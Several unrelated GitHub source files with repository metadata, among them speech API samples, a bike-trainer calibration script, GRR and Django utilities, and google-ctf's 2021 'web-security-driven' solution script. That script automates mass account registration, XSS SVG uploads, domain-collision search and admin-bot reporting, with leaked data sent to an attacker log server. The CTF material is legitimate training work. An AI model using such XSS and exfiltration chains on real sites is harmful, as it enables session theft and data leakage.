"language": [
{
"name": "Python",
"bytes": "7"
},
{
"name": "Shell",
"bytes": "246"
}
],
"symlink_target": ""
} |
from google.cloud import speech_v2
def sample_create_phrase_set():
# Create a client
client = speech_v2.SpeechClient()
# Initialize request argument(s)
request = speech_v2.CreatePhraseSetRequest(
parent="parent_value",
)
# Make the request
operation = client.create_phrase_set(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END speech_v2_generated_Speech_CreatePhraseSet_sync]
| {
"content_hash": "056d56d76e545a3f563e5eeb5e752e3b",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 57,
"avg_line_length": 22.782608695652176,
"alnum_prop": 0.6908396946564885,
"repo_name": "googleapis/python-speech",
"id": "c311d648c15f360f9e1e63f74cc5813013ee07c8",
"size": "1904",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/speech_v2_generated_speech_create_phrase_set_sync.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "2077065"
},
{
"name": "Shell",
"bytes": "30660"
}
],
"symlink_target": ""
} |
import ant, os, usb.core, time, binascii, T1932_calibration, sys
import Tkinter as tkinter
def update_status(label, status):
label.config(text=status)
window.update_idletasks()
window.update()
window = tkinter.Tk()
window.title("Tacx calibration")
window.geometry("600x300")
tkinter.Label(window, text="Status: ").grid(row=1,column=1, sticky="E")
tkinter.Label(window, text="Calibrated: ").grid(row=2,column=1, sticky="E")
tkinter.Label(window, text="Resistance Level: ").grid(row=3,column=1, sticky="E")
tkinter.Label(window, text="Speed: ").grid(row=4,column=1, sticky="E")
tkinter.Label(window, text="Power: ").grid(row=5,column=1, sticky="E")
tkinter.Label(window, text="Instructions: ").grid(row=6,column=1, sticky="E")
status_label = tkinter.Label(window, text="None")
status_label.grid(row=1,column=2, sticky="W")
calibrated_label = tkinter.Label(window, text="False")
calibrated_label.grid(row=2,column=2, sticky="W")
resistance_label = tkinter.Label(window, text="None")
resistance_label.grid(row=3,column=2, sticky="W")
speed_label = tkinter.Label(window, text="None")
speed_label.grid(row=4,column=2, sticky="W")
power_label = tkinter.Label(window, text="None")
power_label.grid(row=5,column=2, sticky="W")
instructions_label = tkinter.Label(window, text="None")
instructions_label.grid(row=6,column=2, sticky="W")
window.update_idletasks()
window.update()
product=0
idpl = [0x1932, 0x1942]#iflow, fortius
for idp in idpl:
dev = usb.core.find(idVendor=0x3561, idProduct=idp) #find iflow device
if dev != None:
product=idp
break
if product == 0:
print "Trainer not found"
sys.exit()
#initialise TACX USB device
byte_ints = [2,0,0,0] # will not read cadence until initialisation byte is sent
byte_str = "".join(chr(n) for n in byte_ints)
dev.write(0x02,byte_str)
time.sleep(1)
###windows###
if os.name == 'nt':
found_available_ant_stick= True
try:
dev_ant = usb.core.find(idVendor=0x0fcf, idProduct=0x1009) #get ANT+ stick (garmin)
dev_ant.set_configuration() #set active configuration
try:#check if in use
stringl=["a4 01 4a 00 ef 00 00"]#reset system
ant.send(stringl, dev_ant, debug)
print "Using Garmin dongle..."
except usb.core.USBError:
print "Garmin Device is in use"
found_available_ant_stick = False
except AttributeError:
print "No Garmin Device found"
found_available_ant_stick = False
if found_available_ant_stick == False:
found_available_ant_stick = True
try:
dev_ant = usb.core.find(idVendor=0x0fcf, idProduct=0x1008) #get ANT+ stick (suunto)
dev_ant.set_configuration() #set active configuration
try:#check if in use
stringl=["a4 01 4a 00 ef 00 00"]#reset system
ant.send(stringl, dev_ant, False)
print "Using Suunto dongle..."
except usb.core.USBError:
print "Suunto Device is in use"
found_available_ant_stick = False
except AttributeError:
print "No Suunto Device found"
found_available_ant_stick = False
if found_available_ant_stick == False:
print "No available ANT+ device. Retry after quitting Garmin Express or other application that uses ANT+. If still fails then remove dongles for 10s then reinsert"
sys.exit()
###Linux###
elif os.name == 'posix':
#Find ANT+ USB stick on serial (Linux)
ant_stick_found = False
for p in glob.glob('/dev/ttyUSB*'):
dev_ant = serial.Serial(p, 19200, rtscts=True,dsrdtr=True)
dev_ant.timeout = 0.1
dev_ant.write(binascii.unhexlify("a4014a00ef0000")) #probe with reset command
reply = binascii.hexlify(dev_ant.read(size=256))
if reply == "a4016f20ea" or reply == "a4016f00ca":#found ANT+ stick
serial_port=p
ant_stick_found = True
else: dev_ant.close()#not correct reply to reset
if ant_stick_found == True : break
if ant_stick_found == False:
print 'Could not find ANT+ device. Check output of "lsusb | grep 0fcf" and "ls /dev/ttyUSB*"'
sys.exit()
else:
print "OS not Supported"
sys.exit()
ant.calibrate(dev_ant)#calibrate ANT+ dongle
#calibrate as power sensor
string=[
"a4 03 42 00 00 00 e5 00 00", #42 assign channel
"a4 05 51 00 00 00 0b 00 fb 00 00", #51 set channel id, 0b device=power sensor
"a4 02 45 00 39 da 00 00", #45 channel freq
"a4 03 43 00 f6 1f 0d 00 00", #43 msg period
"a4 02 71 00 00 d7 00 00", #71 Set Proximity Search chann number 0 search threshold 0
"a4 02 63 00 0a cf 00 00", #63 low priority search channel number 0 timeout 0
"a4 02 44 00 02 e0 00 00", #44 Host Command/Response
"a4 01 4b 00 ee 00 00" #4b ANT_OpenChannel message ID channel = 0 D00001229_Fitness_Modules_ANT+_Application_Note_Rev_3.0.pdf
]
ant.send(string, dev_ant, True)
power_meter = False
calibrated = False
packets_rx=0
resistance_level=0
target_power=0
power=0
speed=0
try:
while True:
reply = {}
last_measured_time = time.time() * 1000
#add wait so we only send every 250ms
try:
#get power data
read_val = binascii.hexlify(dev_ant.read(0x81,64))
if read_val[8:10]=="10":#a4 09 4e 00 10 ec ff 00 be 4e 00 00 10 #10 power page be 4e accumulated power 00 00 iunstant power
power = int(read_val[22:24],16)*16 + int(read_val[20:22],16)
print read_val, power
power_meter = True
elif read_val[0:10]=="a4094f0001":#calibration response
if read_val[10:12]=="ac":
update_status(status_label, "Calibration successful")
update_status(instructions_label, "Resume pedalling")
calibrated = True
update_status(calibrated_label, "True")
elif read_val[10:12]=="af":
update_status(status_label, "Calibration failed")
else:
update_status(status_label, "Calibration unknown response")
if power_meter:
packets_rx += 1
if not calibrated and packets_rx<40:
update_status(status_label, "Power data received - waiting to calibrate")
update_status(instructions_label, "Keep pedalling")
if packets_rx == 40:
update_status(status_label, "Starting calibration")
update_status(instructions_label, "STOP PEDALLING- power meter calibration in 10 seconds.\nPut pedals into position as instructed by your power meter manufacturer")
elif packets_rx == 80:
update_status(status_label, "Calibrating...")
update_status(instructions_label, "Do not pedal")
ant.send(["a4 09 4f 00 01 aa ff ff ff ff ff ff 49 00 00"], dev_ant, True)
else:
update_status(status_label, "No data from power meter yet")
update_status(instructions_label, "Keep pedalling")
#receive data from trainer
data = dev.read(0x82,64) #get data from device
#print "TRAINER",data
if len(data)>40:
fs = int(data[33])<<8 | int(data[32])
speed = round(fs/2.8054/100,1)#speed kph
#send data to trainer
r6=int(T1932_calibration.reslist[resistance_level])>>8 & 0xff #byte6
r5=int(T1932_calibration.reslist[resistance_level]) & 0xff #byte 5
#echo pedal cadence back to trainer
if len(data) > 40:
pedecho = data[42]
else:
pedecho = 0
byte_ints = [0x01, 0x08, 0x01, 0x00, r5, r6, pedecho, 0x00 ,0x02, 0x52, 0x10, 0x04]
byte_str = "".join(chr(n) for n in byte_ints)
dev.write(0x02,byte_str)#send data to device
if packets_rx % 50 == 0 and packets_rx > 150:
target_power += 50
if target_power == 500:
target_power = 50
resistance_level += 1
if resistance_level == 14:
print "Power calibration file created"
sys.exit()
update_status(status_label, "Creating calibration file")
update_status(instructions_label, "Aim for a target power of %s watts. It doesn't matter if you don't hit it exactly or can't achieve it at all!" % target_power)
update_status(resistance_label, "%s" % resistance_level)
update_status(speed_label, "%skph" % speed)
update_status(power_label, "%sW" % power)
else:
update_status(status_label, "Trainer possibly not powered up")
except usb.core.USBError:
update_status(status_label, "No data received from power meter")
update_status(instructions_label, "Start pedalling")
power_meter = False
time_to_process_loop = time.time() * 1000 - last_measured_time
sleep_time = 0.25 - (time_to_process_loop)/1000
if sleep_time < 0: sleep_time = 0
time.sleep(sleep_time)
except KeyboardInterrupt: # interrupt power data sending with ctrl c, make sure script continues to reset device
pass
ant.send(["a4 01 4a 00 ef 00 00"],dev_ant, False)#reset ANT+ dongle
| {
"content_hash": "2a7537a600ded6eeae2aa8cd0c0956b5",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 185,
"avg_line_length": 37.87982832618026,
"alnum_prop": 0.6571493315205076,
"repo_name": "john-38787364/antifier",
"id": "db6d26e5db9fb7c7d5bc1f4cd9a8489203529513",
"size": "8826",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "old-scripts/power_curve.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "648"
},
{
"name": "Python",
"bytes": "113853"
},
{
"name": "Shell",
"bytes": "2016"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import re
from collections import defaultdict
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
from zerver.lib.user_agent import parse_user_agent
user_agents_parsed = defaultdict(int) # type: Dict[str, int]
user_agents_path = os.path.join(os.path.dirname(__file__), "user_agents_unique")
parse_errors = 0
for line in open(user_agents_path).readlines():
line = line.strip()
match = re.match('^(?P<count>[0-9]+) "(?P<user_agent>.*)"$', line)
if match is None:
print(line)
continue
groupdict = match.groupdict()
count = groupdict["count"]
user_agent = groupdict["user_agent"]
ret = parse_user_agent(user_agent)
if ret is None:
print("parse error", line)
parse_errors += 1
continue
user_agents_parsed[ret["name"]] += int(count)
for key in user_agents_parsed:
print(" ", key, user_agents_parsed[key])
print("%s parse errors!" % (parse_errors,))
| {
"content_hash": "6ab9cc8dacbe10ac84a027069a59ac06",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 80,
"avg_line_length": 30.424242424242426,
"alnum_prop": 0.647410358565737,
"repo_name": "Frouk/zulip",
"id": "78aa1c5acd0bd3cd20a7baedd4ff3be2358c81a3",
"size": "1029",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/test_user_agent_parsing.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "164"
},
{
"name": "CSS",
"bytes": "183514"
},
{
"name": "CoffeeScript",
"bytes": "18435"
},
{
"name": "Groovy",
"bytes": "5516"
},
{
"name": "HTML",
"bytes": "395036"
},
{
"name": "JavaScript",
"bytes": "1582587"
},
{
"name": "Nginx",
"bytes": "1228"
},
{
"name": "PHP",
"bytes": "18930"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "383634"
},
{
"name": "Puppet",
"bytes": "96085"
},
{
"name": "Python",
"bytes": "1984569"
},
{
"name": "Ruby",
"bytes": "255867"
},
{
"name": "Shell",
"bytes": "33353"
}
],
"symlink_target": ""
} |
import requests
import re
import json
import sys
import argparse
import concurrent.futures
import random
def updateJSON():
with open(FILE, 'w') as file:
json.dump(USERS, file, indent=2)
def murl(path):
return 'https://%s%s' % (DOMAIN, path)
def register(i, sess, csrf):
sess.post(murl('/register'), data={
"username": ACC_PREFIX + str(i),
"password": ACC_PASSWORD,
"_csrf": csrf
}, allow_redirects=False)
USERS['users'].append()
def report(id):
r = requests.post(murl('/report'), data={
'fileid': id + '&preview=1'
})
print('Reported: %s' % r.text)
def registerAll():
sess = requests.Session()
r = sess.get(murl('/login')).text
csrf = re.findall(r'"_csrf" value="([^"]+)', r)[0]
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for i in range(0, ACCOUNT_NO):
executor.submit(register, i, sess, csrf)
def login(i):
sess = requests.Session()
r = sess.get(murl('/login')).text
csrf = re.findall(r'"_csrf" value="([^"]+)', r)[0]
r = sess.post(murl('/login'), data={
"username": ACC_PREFIX + str(i),
"password": ACC_PASSWORD,
"_csrf": csrf
});
uid = re.findall(r'const user_id = (\d+);', r.text)[0]
return int(uid), sess.cookies['connect.sid'], csrf
def upload(csrf, file, cookie):
r = requests.post(murl('/upload'), files={
'file': open(file, 'rb')
}, data={
'visibility': 'public',
'_csrf': csrf
}, headers={
'Cookie': 'connect.sid=' + cookie
}, allow_redirects=False)
return re.findall(r'#file-(\d+)', r.headers['location'])[0]
def upload2(csrf, data, cookie):
r = requests.post(murl('/upload'), files={
'file': ('send_poc.svg', data)
}, data={
'visibility': 'public',
'_csrf': csrf
}, headers={
'Cookie': 'connect.sid=' + cookie
}, allow_redirects=False)
return re.findall(r'#file-(\d+)', r.headers['location'])[0]
def get_files(cookie):
return json.loads(requests.get(murl('/user/files'), headers={
'Cookie': 'connect.sid=' + cookie
}).text)
def share(file_id, uids, csrf, cookie):
r = requests.post(murl('/file/share'), headers={
'x-csrf-token': csrf,
'cookie': 'connect.sid=' + cookie
},json={
'to': uids,
'file_id': file_id
})
def refreshCookieThread(i, doUpload):
uid, cookie, csrf = login(i)
USERS['users'][i] = [i, uid, cookie, csrf]
if doUpload:
upload(csrf,XSS_FILE,cookie)
def refreshCookies(doUpload=False):
if len(USERS['users']) < ACCOUNT_NO:
USERS['users'] = [None]*ACCOUNT_NO
doUpload = True
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for i in range(0, ACCOUNT_NO):
executor.submit(refreshCookieThread, i, doUpload)
updateJSON()
def shareFileToAll():
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for _, uid, cookie, csrf in USERS['users']:
uids = list(map(lambda x: x[1], USERS['users']))
files = list(filter(lambda x: x['owner'] == uid, get_files(cookie)))
for i in range(0, ACCOUNT_NO, 100):
executor.submit(share, files[0]['id'], uids[i:i+100], csrf, cookie)
def createFilesMap():
domains = {}
for user, uid, cookie, csrf in USERS['users']:
files = get_files(cookie)
for file in files:
user_hash = file['docId'].split('-')[2]
domains[user_hash] = {'uid': uid, 'owner':file['owner'], 'file_id':file['id']}
USERS['domains'] = domains
def findDomainThread(cookie, uid, domain, domains):
if "found" in domains:
return
files = get_files(cookie)
for file in files:
user_hash = file['docId'].split('-')[2]
domains[user_hash] = {'uid': uid, 'owner':file['owner']}
if user_hash == domain:
domains["found"] = (uid,file['owner'])
return 1
def findDomain(domain):
domains = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for _, uid, cookie, _ in USERS['users']:
executor.submit(findDomainThread, cookie, uid, domain, domains)
if not "found" in domains:
print("Domain not found. Unique domains generated %d" % len(domains.keys()))
exit(1)
(uid, oid) = domains["found"]
owner = next(x for x in USERS['users'] if x[1] == oid)
user = next(x for x in USERS['users'] if x[1] == uid)
return (owner, user)
# updateJSON()
def findFileThread(owner, user, domain, result):
if "found" in result: return
owner_cookie = owner[2]
user_cookie = user[2]
file_id = upload(owner[3], XSS_FILE, owner_cookie)
if "found" in result: return
r = requests.get(murl('/file') + '?id=%s' % file_id, headers={
'cookie': 'connect.sid=' + user_cookie
},allow_redirects=False)
if r.headers['location'].startswith('//'+domain):
doc_url = 'https:' + r.headers['location']
if "found" in result: return
r2 = requests.get(doc_url, allow_redirects=False)
nonce, file_url = r2.cookies['nonce'], r2.headers['location']
if "found" in result: return
r2 = requests.get('https:' + file_url, headers={
'cookie': 'connect.sid=' + user_cookie
},allow_redirects=False)
real_doc_url = 'https:' + r2.headers['location']
result["found"] = (real_doc_url, nonce)
def findFile(owner, user, domain):
result = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=6) as executor:
for _ in range(100):
executor.submit(findFileThread, owner, user, domain, result)
if not "found" in result: return None, None
return result["found"]
parser = argparse.ArgumentParser(description='Execute Proof of Concept')
parser.add_argument('--domain', required='--send' in sys.argv, type=str, help="Find collision. Add --send to send it to admin")
parser.add_argument('--prefix', type=str, help='Account prefix for --register and --reset')
parser.add_argument('--reset', action='store_true', default=False, help='Reset the dictionary')
parser.add_argument('--register', action='store_true', default=False, help='Register all accounts')
parser.add_argument('--refresh', action='store_true', default=False, help='Refresh session cookies')
parser.add_argument('--share', action='store_true', default=False, help='Share all files with each others')
parser.add_argument('--leak-domain', action='store_true', default=False, help="Leak flag's domain")
parser.add_argument('--send', action='store_true', default=False, help="Send poc to admin")
parser.add_argument('--log-server', required='--send' in sys.argv or '--leak-domain' in sys.argv, type=str, help="Log server for leaked stuff")
args = parser.parse_args()
DOMAIN = 'chall.secdriven.dev'
ACC_PREFIX = 'poc_' + str(random.randint(0,10000)) + "_"
ACC_PASSWORD = 's3creT-P4ss'
FILE = sys.path[0] + '/users.json'
XSS_FILE = sys.path[0] + '/xss.svg'
XSS_SEND_FILE = sys.path[0] + '/send_to_admin.svg'
ACCOUNT_NO = 400
THREADS = 24
SEND_TO_ADMIN = False
with open(FILE, 'r') as file:
USERS = json.load(file)
if args.leak_domain:
if args.refresh:
refreshCookies()
print("Refreshed cookies")
[_,_,cookie,csrf] = USERS['users'][0]
xss_file = open(XSS_SEND_FILE, 'r').read()
data = xss_file.replace('$LOG_SERVER', args.log_server)
file_id = upload2(csrf, data, cookie)
print("Uploaded file: %s" % file_id)
report(file_id)
exit(1)
if args.prefix:
ACC_PREFIX = args.prefix
if args.reset == True:
USERS = {"users": []}
registerAll()
print("Accounts registered with prefix: %s" % ACC_PREFIX)
refreshCookies(True)
print("Cookies refreshed & files uploaded")
shareFileToAll()
print("Files shared")
if args.register == True:
registerAll()
print("Accounts registered with prefix: %s" % ACC_PREFIX)
if args.refresh == True:
refreshCookies()
print("Cookies refreshed")
if args.share == True:
shareFileToAll()
print("Files shared")
if args.domain:
user_domain = args.domain.split('-')[2]
owner, user = findDomain(user_domain)
print("Found users (owner:%d, user:%d)" % (owner[1], user[1]))
doc_url, nonce = findFile(owner, user, args.domain)
print("Found doc_url %s nonce=%s" % (doc_url, nonce))
if args.send:
[_,_,cookie,csrf] = USERS['users'][0]
xss_file = open(XSS_SEND_FILE, 'r').read()
data = xss_file.replace('$DOC_URL', doc_url).replace('$NONCE', nonce).replace('$LOG_SERVER', args.log_server)
file_id = upload2(csrf,data,cookie)
print("Uploaded file: %s" % file_id)
report(file_id)
| {
"content_hash": "02fdc08fc0d341e1b2c822df42479956",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 143,
"avg_line_length": 31.152985074626866,
"alnum_prop": 0.6463049467002037,
"repo_name": "google/google-ctf",
"id": "9318d386fb40b6f9c167e4056169a9824a44440e",
"size": "8925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "2021/quals/web-security-driven/solution/poc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AIDL",
"bytes": "508"
},
{
"name": "Assembly",
"bytes": "107617"
},
{
"name": "BASIC",
"bytes": "6068"
},
{
"name": "Batchfile",
"bytes": "1032"
},
{
"name": "Blade",
"bytes": "14530"
},
{
"name": "C",
"bytes": "1481904"
},
{
"name": "C++",
"bytes": "2139472"
},
{
"name": "CMake",
"bytes": "11595"
},
{
"name": "CSS",
"bytes": "172375"
},
{
"name": "Dart",
"bytes": "6282"
},
{
"name": "Dockerfile",
"bytes": "232352"
},
{
"name": "EJS",
"bytes": "92308"
},
{
"name": "Emacs Lisp",
"bytes": "2668"
},
{
"name": "GDB",
"bytes": "273"
},
{
"name": "GLSL",
"bytes": "33392"
},
{
"name": "Go",
"bytes": "3031142"
},
{
"name": "HTML",
"bytes": "467647"
},
{
"name": "Java",
"bytes": "174199"
},
{
"name": "JavaScript",
"bytes": "2643200"
},
{
"name": "Lua",
"bytes": "5944"
},
{
"name": "Makefile",
"bytes": "149152"
},
{
"name": "NSIS",
"bytes": "2800"
},
{
"name": "Nix",
"bytes": "139"
},
{
"name": "PHP",
"bytes": "311900"
},
{
"name": "Perl",
"bytes": "32742"
},
{
"name": "Pug",
"bytes": "8752"
},
{
"name": "Python",
"bytes": "1756592"
},
{
"name": "Red",
"bytes": "188"
},
{
"name": "Rust",
"bytes": "541267"
},
{
"name": "Sage",
"bytes": "39814"
},
{
"name": "Shell",
"bytes": "382149"
},
{
"name": "Smali",
"bytes": "2316656"
},
{
"name": "Starlark",
"bytes": "8216"
},
{
"name": "SystemVerilog",
"bytes": "16466"
},
{
"name": "VCL",
"bytes": "895"
},
{
"name": "Verilog",
"bytes": "7230"
},
{
"name": "Vim Script",
"bytes": "890"
},
{
"name": "Vue",
"bytes": "10248"
}
],
"symlink_target": ""
} |
from django.db import models
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __str__(self):
return self.question_text
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self):
return self.choice_text
| {
"content_hash": "ecaecd5a752b9b8b0acd3494160427e4",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 92,
"avg_line_length": 27.72222222222222,
"alnum_prop": 0.6993987975951904,
"repo_name": "danicarrion/pyrestcli",
"id": "3d61611c505d2ec73a6414ea9572cf41badabf5b",
"size": "499",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/restserver/polls/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38706"
}
],
"symlink_target": ""
} |
from feti.models.campus import Campus
from feti.models.course import Course
from django.core.management.base import BaseCommand
__author__ = 'Rizky Maulana Nugraha "lucernae" <[email protected]>'
__date__ = '16/07/15'
class Command(BaseCommand):
help = 'Update long description in Campus and Course models'
def handle(self, *args, **options):
self.stdout.write('Updating long description for Campus...')
for campus in Campus.objects.all():
campus.save()
self.stdout.write('Update completed.')
self.stdout.write('---------------------------------------')
self.stdout.write('Updating long description for Course...')
for course in Course.objects.all():
course.save()
self.stdout.write('Update completed.')
| {
"content_hash": "4b1afc2530f12cfd3b2a402db434b568",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 70,
"avg_line_length": 38.04761904761905,
"alnum_prop": 0.6345431789737171,
"repo_name": "cchristelis/feti",
"id": "9b34a6e97351320cbe1bf63ec9902325bd950b39",
"size": "814",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "django_project/feti/management/commands/updatelongdescription.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "66178"
},
{
"name": "HTML",
"bytes": "3411827"
},
{
"name": "JavaScript",
"bytes": "525391"
},
{
"name": "Makefile",
"bytes": "16513"
},
{
"name": "PLpgSQL",
"bytes": "9805987"
},
{
"name": "Python",
"bytes": "372712"
},
{
"name": "Shell",
"bytes": "2539"
}
],
"symlink_target": ""
} |
"""Wrapper for running a fleetspeak client in a virtualenv setup.
This script is meant to be used for development.
Requirements for running this script:
* Running from a virtualenv.
* PIP package `fleetspeak-client-bin` is installed.
* `grr_config_updater initialize` has been run.
* Fleetspeak has been enabled.
"""
import os
import platform
import subprocess
from absl import app
from google.protobuf import text_format
from grr_response_core import config
from grr_response_core.lib import config_lib
from grr_response_core.lib import package
from grr_response_core.lib import utils
from grr_response_core.lib.util import temp
from fleetspeak.src.client.daemonservice.proto.fleetspeak_daemonservice import config_pb2 as fs_daemon_config_pb2
from fleetspeak.src.client.generic.proto.fleetspeak_client_generic import config_pb2 as fs_cli_config_pb2
from fleetspeak.src.common.proto.fleetspeak import system_pb2 as fs_system_pb2
class Error(Exception):
pass
def _CreateClientConfig(tmp_dir: str) -> str:
"""Creates and returns the path to a fleetspeak client config."""
def TmpPath(*args):
return os.path.join(tmp_dir, *args)
server_config_dir = package.ResourcePath(
"fleetspeak-server-bin", "fleetspeak-server-bin/etc/fleetspeak-server")
if not os.path.exists(server_config_dir):
raise Error(
f"Fleetspeak server config dir not found: {server_config_dir}. "
"Please make sure `grr_config_updater initialize` has been run.")
client_config_name = {
"Linux": "linux_client.config",
"Windows": "windows_client.config",
"Darwin": "darwin_client.config",
}
client_config_path = os.path.join(server_config_dir,
client_config_name[platform.system()])
with open(client_config_path, "r") as f:
client_config = text_format.Parse(f.read(), fs_cli_config_pb2.Config())
if client_config.HasField("filesystem_handler"):
client_config.filesystem_handler.configuration_directory = TmpPath()
# We store the client state file in `Logging.path`.
# 1) We need a writable path, where writing a file doesn't surprise the
# user (as opposed to other paths in the source tree).
# 2) We need the state file to be somewhat persistent, i.e. kept after
# re-runs of this command. Otherwise the client ID of the client would
# change at each re-run.
client_config.filesystem_handler.state_file = os.path.join(
config.CONFIG["Logging.path"], "fleetspeak-client.state")
with open(TmpPath("config"), "w") as f:
f.write(text_format.MessageToString(client_config))
return TmpPath("config")
def _CreateServiceConfig(config_dir: str) -> None:
"""Creates a fleetspeak service config in the config directory."""
service_config_path = config.CONFIG["ClientBuilder.fleetspeak_config_path"]
with open(service_config_path, "r") as f:
data = config.CONFIG.InterpolateValue(f.read())
service_config = text_format.Parse(data,
fs_system_pb2.ClientServiceConfig())
daemon_config = fs_daemon_config_pb2.Config()
service_config.config.Unpack(daemon_config)
del daemon_config.argv[:]
daemon_config.argv.extend([
"grr_client",
])
service_config.config.Pack(daemon_config)
utils.EnsureDirExists(os.path.join(config_dir, "textservices"))
with open(os.path.join(config_dir, "textservices", "GRR.textproto"),
"w") as f:
f.write(text_format.MessageToString(service_config))
def _RunClient(tmp_dir: str) -> None:
"""Runs the fleetspeak client."""
config_path = _CreateClientConfig(tmp_dir)
_CreateServiceConfig(tmp_dir)
fleetspeak_client = package.ResourcePath(
"fleetspeak-client-bin",
"fleetspeak-client-bin/usr/bin/fleetspeak-client")
if not fleetspeak_client or not os.path.exists(fleetspeak_client):
raise Error(
f"Fleetspeak client binary not found: {fleetspeak_client}."
"Please make sure that the package `fleetspeak-client-bin` has been "
"installed.")
command = [
fleetspeak_client,
"--logtostderr",
"-config",
config_path,
]
subprocess.check_call(command)
def main(argv):
del argv # unused
config_lib.ParseConfigCommandLine()
with temp.AutoTempDirPath(remove_non_empty=True) as tmp_dir:
_RunClient(tmp_dir)
if __name__ == "__main__":
app.run(main)
| {
"content_hash": "6b91164f9982cf16912b405b09573464",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 113,
"avg_line_length": 36.773109243697476,
"alnum_prop": 0.7047531992687386,
"repo_name": "google/grr",
"id": "f33dc66331c315209c242ec42c15afdf17911040",
"size": "4398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "grr/client/grr_response_client/fleetspeak_client_wrapper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "12697"
},
{
"name": "C++",
"bytes": "54814"
},
{
"name": "Dockerfile",
"bytes": "1822"
},
{
"name": "HCL",
"bytes": "8451"
},
{
"name": "HTML",
"bytes": "366783"
},
{
"name": "JavaScript",
"bytes": "13088"
},
{
"name": "Jupyter Notebook",
"bytes": "199216"
},
{
"name": "Makefile",
"bytes": "3244"
},
{
"name": "PowerShell",
"bytes": "531"
},
{
"name": "Python",
"bytes": "8844725"
},
{
"name": "Roff",
"bytes": "444"
},
{
"name": "SCSS",
"bytes": "105120"
},
{
"name": "Shell",
"bytes": "48663"
},
{
"name": "Standard ML",
"bytes": "8172"
},
{
"name": "TypeScript",
"bytes": "2139377"
}
],
"symlink_target": ""
} |
"""Script to parse perf data from Chrome Endure test executions, to be graphed.
This script connects via HTTP to a buildbot master in order to scrape and parse
perf data from Chrome Endure tests that have been run. The perf data is then
stored in local text files to be graphed by the Chrome Endure graphing code.
It is assumed that any Chrome Endure tests that show up on the waterfall have
names that are of the following form:
"endure_<webapp_name>-<test_name>"
This script accepts either a URL or a local path as a buildbot location.
It switches its behavior if a URL is given, or a local path is given.
When a URL is given, it gets buildbot logs from the buildbot builders URL
e.g. http://build.chromium.org/p/chromium.endure/builders/.
When a local path is given, it gets buildbot logs from buildbot's internal
files in the directory e.g. /home/chrome-bot/buildbot.
"""
import cPickle
import getpass
import logging
import optparse
import os
import re
import simplejson
import socket
import string
import sys
import time
import urllib
import urllib2
CHROME_ENDURE_SLAVE_NAMES = [
'Linux QA Perf (0)',
'Linux QA Perf (1)',
'Linux QA Perf (2)',
'Linux QA Perf (3)',
'Linux QA Perf (4)',
'Linux QA Perf (dbg)(0)',
'Linux QA Perf (dbg)(1)',
'Linux QA Perf (dbg)(2)',
'Linux QA Perf (dbg)(3)',
'Linux QA Perf (dbg)(4)',
]
BUILDER_URL_BASE = 'http://build.chromium.org/p/chromium.endure/builders/'
LAST_BUILD_NUM_PROCESSED_FILE = os.path.join(os.path.dirname(__file__),
'_parser_last_processed.txt')
LOCAL_GRAPH_DIR = '/home/%s/www/chrome_endure_clean' % getpass.getuser()
MANGLE_TRANSLATION = string.maketrans(' ()', '___')
def SetupBaseGraphDirIfNeeded(webapp_name, test_name, dest_dir):
"""Sets up the directory containing results for a particular test, if needed.
Args:
webapp_name: The string name of the webapp associated with the given test.
test_name: The string name of the test.
dest_dir: The name of the destination directory that needs to be set up.
"""
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Test name directory.
os.chmod(dest_dir, 0755)
# Create config file.
config_file = os.path.join(dest_dir, 'config.js')
if not os.path.exists(config_file):
with open(config_file, 'w') as f:
f.write('var Config = {\n')
f.write('buildslave: "Chrome Endure Bots",\n')
f.write('title: "Chrome Endure %s Test: %s",\n' % (webapp_name.upper(),
test_name))
f.write('};\n')
os.chmod(config_file, 0755)
# Set up symbolic links to the real graphing files.
link_file = os.path.join(dest_dir, 'index.html')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.html', link_file)
link_file = os.path.join(dest_dir, 'endure_plotter.js')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.js', link_file)
link_file = os.path.join(dest_dir, 'js')
if not os.path.exists(link_file):
os.symlink('../../js', link_file)
def WriteToDataFile(new_line, existing_lines, revision, data_file):
